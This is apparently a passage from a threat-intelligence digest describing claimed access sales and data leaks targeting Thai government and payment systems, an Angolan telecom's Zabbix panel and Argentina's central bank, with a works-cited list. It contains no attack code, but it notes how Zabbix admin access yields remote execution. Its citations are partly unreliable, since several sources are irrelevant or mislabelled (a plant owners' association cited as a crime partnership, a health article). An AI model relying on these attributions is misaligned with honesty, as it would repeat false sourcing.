Incident Details: A group identified as “NXBB.SEC” claims to have leaked access to an e-payment system in Thailand. The specific nature of the access or the compromised data is not detailed, but unauthorized access to an e-payment system could lead to financial fraud, theft of payment credentials, or disruption of financial services.
Associated Threat Actor(s) Profile: NXBB.SEC
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “NXBB.SEC” in the available research material [15]. The source snippets discuss “Ghost actors” and “RansomHub,” but do not provide information specific to “NXBB.SEC.”
Motivation and Objectives: The motivation for leaking access to an e-payment system is typically financial, either by directly exploiting the access for fraudulent transactions or by selling the access to other cybercriminals.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain access are not detailed. Compromising e-payment systems often involves exploiting web application vulnerabilities, API weaknesses, or gaining access through compromised credentials.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “NXBB.SEC” based on the provided research.
Relevant Links:
- Published URL: https://t.me/NxbbSec/374
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/b87070c9-e2d0-4d9c-9c47-126dd882d722.png
Incident 15: Alleged Leak of Access to Immigration Bureau Accommodation Notification System (Thailand)
Incident Details: The group “NXBB.SEC” also claims to have leaked access to the Immigration Bureau Accommodation Notification System in Thailand. Unauthorized access to such a system could expose sensitive personal and travel information of individuals, potentially leading to identity theft, surveillance, or other forms of abuse.
Associated Threat Actor(s) Profile: NXBB.SEC
Identity and Aliases: As with Incident 14, there is no specific profile or known aliases for “NXBB.SEC” in the available research material [15].
Motivation and Objectives: The motivation for leaking access to a government immigration system could be financial (selling access or data), hacktivism, or intelligence gathering.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain access are not detailed. Compromising government systems often involves exploiting vulnerabilities in public-facing applications, network misconfigurations, or social engineering.
Historical Context and Noteworthy Campaigns: No additional historical context or noteworthy campaigns can be attributed to “NXBB.SEC” beyond the two incidents mentioned in this report.
Relevant Links:
- Published URL: https://t.me/NxbbSec/377
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/242ebd1e-fc2c-4f5e-9430-24c0f8ee72ea.png
Incident 16: Alleged Sale of Unauthorized Access to Agricultural Land Reform Office (Thailand)
Incident Details: A group identified as “NDT SEC” claims to be selling unauthorized access to the Agricultural Land Reform Office in Thailand; the listing reportedly contains user IDs and passwords. The claim was posted on the same Telegram channel (NxbbSec) as Incidents 14 and 15, so the “NDT SEC” attribution should be treated with caution. Compromised credentials for a government office can lead to further network infiltration, data exfiltration, or disruption of services.
Associated Threat Actor(s) Profile: NDT SEC
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “NDT SEC” in the available research material [16]. The cited items concern the U.S. SEC’s Cyber and Emerging Technologies Unit and FBI warnings about end-of-life routers, and contain nothing specific to “NDT SEC”; the “SEC” in the handle should not be confused with the Securities and Exchange Commission.
Motivation and Objectives: The motivation for selling unauthorized access is typically financial, allowing other malicious actors to leverage the compromised credentials for their own objectives.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain access and obtain User IDs and Passwords are not detailed. Common methods include phishing, brute-force attacks, or exploiting vulnerabilities in web applications or network services.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “NDT SEC” based on the provided research.
Relevant Links:
- Published URL: https://t.me/NxbbSec/373
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/49e1ecd9-e040-4fa1-a491-fd018d4eb465.png
Incident 17: Alleged Sale of Admin Access to Zabbix (Telecom Company)
Incident Details: A threat actor named “h4tr3dw0rld” is selling access to a Zabbix admin panel with over 16,000 active hosts, claiming Super Admin permissions. The target appears to be a telecom company based in Angola. API data reportedly shows 16,052 enabled (monitored) hosts out of 16,187 total, along with 30 users spread across multiple administrative and read-only user groups. Zabbix is an enterprise-class open source monitoring solution; a Super Admin can create global scripts that execute on the Zabbix server or on any agent configured to allow remote commands, so this access is potentially remote code execution across the monitored estate rather than mere visibility into it, posing a severe risk to the telecom infrastructure.
Associated Threat Actor(s) Profile: h4tr3dw0rld
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “h4tr3dw0rld” in the available research material. This suggests that “h4tr3dw0rld” is likely a unique handle for an individual or a small, unprofiled group operating as an initial access broker.
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” unauthorized access. Gaining Super Admin access to a critical monitoring system like Zabbix in a telecom environment could be highly valuable for espionage, sabotage, or further network exploitation.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain Zabbix admin access are not detailed. Common paths to compromising monitoring systems include unpatched vulnerabilities in the Zabbix frontend or API, default or weak credentials (Zabbix ships with a default “Admin” account), and internet-exposed frontends. The host and user counts quoted in the listing are exactly what the Zabbix API returns from host.get and user.get, which indicates the actor already holds a valid session or API token and has enumerated the instance.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “h4tr3dw0rld” based on the provided research.
Relevant Links:
- Published URL: https://forum.exploit.in/topic/260268/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/60156300-3ecf-4492-9fe1-ac87678af8cd.png, https://d34iuop8pidsy8.cloudfront.net/12c9b56a-a3e4-452d-9a6f-ed63f750e6e3.png
Incident 18: Alleged Data Breach of Central Bank of the Argentine Republic
Incident Details: A threat actor named “SPOA” claimed responsibility for a significant data breach involving the Central Bank of Argentina (BCRA). The actor is selling a database reportedly containing 19,000,680 customer records. This highly sensitive data includes full names, document types and numbers, CUIL (Código Único de Identificación Laboral, the Argentine labour and tax identifier), date of birth, physical address, phone number, and a unique client number. The records are reportedly linked to detailed financial data such as debt reports, loans, credit information, and overall financial history as registered with BCRA. If genuine, this would be a critical compromise of national financial data. Note, however, that BCRA’s debtor registry (Central de Deudores) is publicly queryable by CUIT/CUIL, so a dataset of this shape could also be assembled by scraping public lookups against a list of identity numbers; the claim of a breach of BCRA’s own systems remains unverified.
Associated Threat Actor(s) Profile: SPOA
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “SPOA” in the available research material [18]. The term “SPOA” in the cited material refers to a “Single Point of Access” in mental health services or to the Scottish Partnership Against Acquisitive Crime (SPAACE), neither of which is a cybercrime group. This suggests that “SPOA” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” the extensive database. Such a comprehensive financial dataset is extremely valuable for large-scale financial fraud, identity theft, and potentially even economic espionage.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to obtain the data are not detailed. A genuine compromise of a central bank’s database would typically require sophisticated methods such as exploiting vulnerabilities in internet-facing applications or APIs, insider access, or highly targeted social engineering; bulk scraping of a public lookup service is a lower-skill alternative that would produce a similar-looking dataset.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “SPOA” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-BCRA-Database-Leak
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/39ee59b5-44db-48
Works cited
- [1] Threat Actors Target U.S. Critical Infrastructure with LummaC2 Malware | CISA, accessed June 4, 2025, https://www.cisa.gov/news-events/alerts/2025/05/21/threat-actors-target-us-critical-infrastructure-lummac2-malware
- [2] The Impact of White Coat Syndrome on Long-term Health – AARP, accessed June 4, 2025, https://www.aarp.org/health/conditions-treatments/white-coat-syndrome/
- [3] China-Linked APT Aquatic Panda: 10-Month Campaign, 7 Global Targets, 5 Malware Families – The Hacker News, accessed June 4, 2025, https://thehackernews.com/2025/03/china-linked-apt-aquatic-panda-10-month.html
- [4] AQUATIC PANDA CYBER THREAT ACTORS – FBI, accessed June 4, 2025, https://www.fbi.gov/wanted/cyber/aquatic-panda-cyber-threat-actors
- [5] Cyber threats impacting the financial sector in 2024 – focus on the main actors, accessed June 4, 2025, https://blog.sekoia.io/cyber-threats-impacting-the-financial-sector-in-2024-focus-on-the-main-actors/
- [6] Cybersecurity TTPs: How Threat Actors Operate – Veeam, accessed June 4, 2025, https://www.veeam.com/blog/ttp-cybersecurity.html
- [7] May 2024: Biggest Cyber Attacks, Data Breaches & Ransomware Attacks, accessed June 4, 2025, https://www.cm-alliance.com/cybersecurity-blog/may-2024-biggest-cyber-attacks-data-breaches-ransomware-attacks
- [8] Threat actor launches email attacks to lift corporate M&A secrets, Mandiant says, accessed June 4, 2025, https://www.cybersecuritydive.com/news/email-corporate-espionage-merger-acquisition/623271/
- [9] KnowBe4 Hires Fake North Korean IT Worker, Catches New Employee Planting Malware, accessed June 4, 2025, https://www.securityweek.com/knowbe4-hires-fake-north-korean-it-worker-catches-new-employee-planting-malware/
- [10] Threat Actor Profile – Shathak malware group – Outpost24, accessed June 4, 2025, https://outpost24.com/blog/threat-actor-profile-shathak/
- [11] Threat Actor Profile – GhostSec – Outpost24, accessed June 4, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
- [12] #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed June 4, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
- [13] Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy, accessed June 4, 2025, https://www.cybersecuritydive.com/news/microsoft-crowdstrike-other-cyber-firms-collaborate-on-threat-actor-taxon/749614/
- [14] CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution | CyberScoop, accessed June 4, 2025, https://cyberscoop.com/crowdstrike-microsoft-threat-group-attribution-initiative/
- [15] Last Year in Ransomware: Top Ransomware Groups and Emerging Threat Actors – Halcyon, accessed June 4, 2025, https://www.halcyon.ai/blog/last-year-in-ransomware-top-ransomware-groups-and-emerging-threat-actors
- [16] FBI warns of cyber actors exploiting end-of-life routers | AHA News, accessed June 4, 2025, https://www.aha.org/news/headline/2025-05-20-fbi-warns-cyber-actors-exploiting-end-life-routers
- [17] SEC Announces Cyber and Emerging Technologies Unit to Protect Retail Investors, accessed June 4, 2025, https://www.sec.gov/newsroom/press-releases/2025-42
- [18] Single Point of Access (SPOA) | Mental Health – Erie County, accessed June 4, 2025, https://www3.erie.gov/mentalhealth/single-point-access-spoa
- [19] Acquisitive Crime Strategy – Scottish Plant Owners Association, accessed June 4, 2025, https://www.spoa.org.uk/download_file/view/1173